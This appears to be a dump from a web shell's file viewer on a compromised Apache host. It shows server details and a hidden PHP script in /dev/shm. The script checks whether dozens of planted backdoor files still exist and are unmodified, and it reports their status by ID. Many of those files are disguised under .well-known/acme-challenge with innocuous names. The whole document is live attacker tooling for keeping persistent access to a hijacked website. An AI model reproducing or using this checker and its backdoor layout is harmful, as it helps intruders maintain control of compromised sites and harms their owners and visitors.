HEX
Server: Apache
System: Linux sg241.singhost.net 2.6.32-896.16.1.lve1.4.51.el6.x86_64 #1 SMP Wed Jan 17 13:19:23 EST 2018 x86_64
User: honghock (909)
PHP: 8.0.30
Disabled: passthru,system,shell_exec,show_source,exec,popen,proc_open
Upload Files
File: //dev/shm/.pset
<?php   $r = '/home/impaktgr/public_html/www.A-Trez.com'; $x = ["/.well-known/acme-challenge/viewpmsg.php"=>"bd@@66374409@@82",
"/.well-known/acme-challenge/tbl_import.php"=>"bd@@66388234@@1130",
"/.well-known/acme-challenge/aidonate.php"=>"bd@@66327309@@$_COOKIE[-",
"/.well-known/template.icon.php"=>"bd@@70824719@@1085",
"/fact_aprove.php"=>"bd@@70943776@@Content-Security-Policy",
"/.well-known/module_icon.php"=>"bd@@66401059@@_COOKIE[3]",
"/colos_form.php"=>"bd@@66348325@@$_COOKIE[2",
"/Contacts.php"=>"bd@@82579242@@568",
"/includest.php"=>"bd@@66287663@@$_COOKIE[-",
"/.well-known/module.icon.php"=>"bd@@66388291@@664",
"/.well-known/acme-challenge/IDAccumulator.php"=>"bd@@66287444@@41",
"/.well-known/acme-challenge/MakeAbsolute.php"=>"bd@@66348374@@427",
"/.well-known/acme-challenge/viewpmsg.php"=>"bd@@66327642@@247",
"/.well-known/configure_old.php"=>"bd@@70944094@@213",
"/.well-known/surveytranslator.php"=>"bd@@66327138@@Content-Security-Policy",
"/popup_address.php"=>"bd@@66388323@@463",
"/.well-known/acme-challenge/tbl_import.php"=>"bd@@66401388@@Large-Allocation",
"/.well-known/surveytranslator.icon.php"=>"bd@@66388079@@_COOKIE[3]",
"/cp.topic.php"=>"bd@@82575477@@527",
"/manifest.php"=>"bd@@66307701@@If-Unmodified-Since",
"/.well-known/module_icon.php"=>"bd@@66348406@@620",
"/.well-known/surveytranslator.icon.php"=>"bd@@66375036@@215",
"/.well-known/surveytranslator.php"=>"bd@@66307973@@375",
"/footer.good.php"=>"bd@@66485140@@1119",
"/lay.post.php"=>"bd@@66485142@@1492",
"/project.php"=>"bd@@70943898@@If-Modified-Since",
"/.well-known/acme-challenge/group_pricing.php"=>"bd@@70844335@@674",
"/f_top.php"=>"bd@@66469047@@622",
"/project.f.php"=>"bd@@66469049@@1742",
"/fact.php"=>"bd@@70944194@@536",
"/.well-known/acme-challenge/xss.php"=>"bd@@70824130@@220",
"/project.php"=>"bd@@70825411@@216",
"/popup_address.php"=>"bd@@66400974@@$_COOKIE[-",
"/bild.php"=>"bd@@82573265@@820",
"/colos.php"=>"bd@@66328037@@247",
"/connector.php"=>"bd@@82564587@@1098",
"/.well-known/acme-challenge/MakeAbsolute.php"=>"bd@@66401523@@53",
"/colos.php"=>"bd@@66348031@@26",
"/includest.php"=>"bd@@50561360@@1551"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');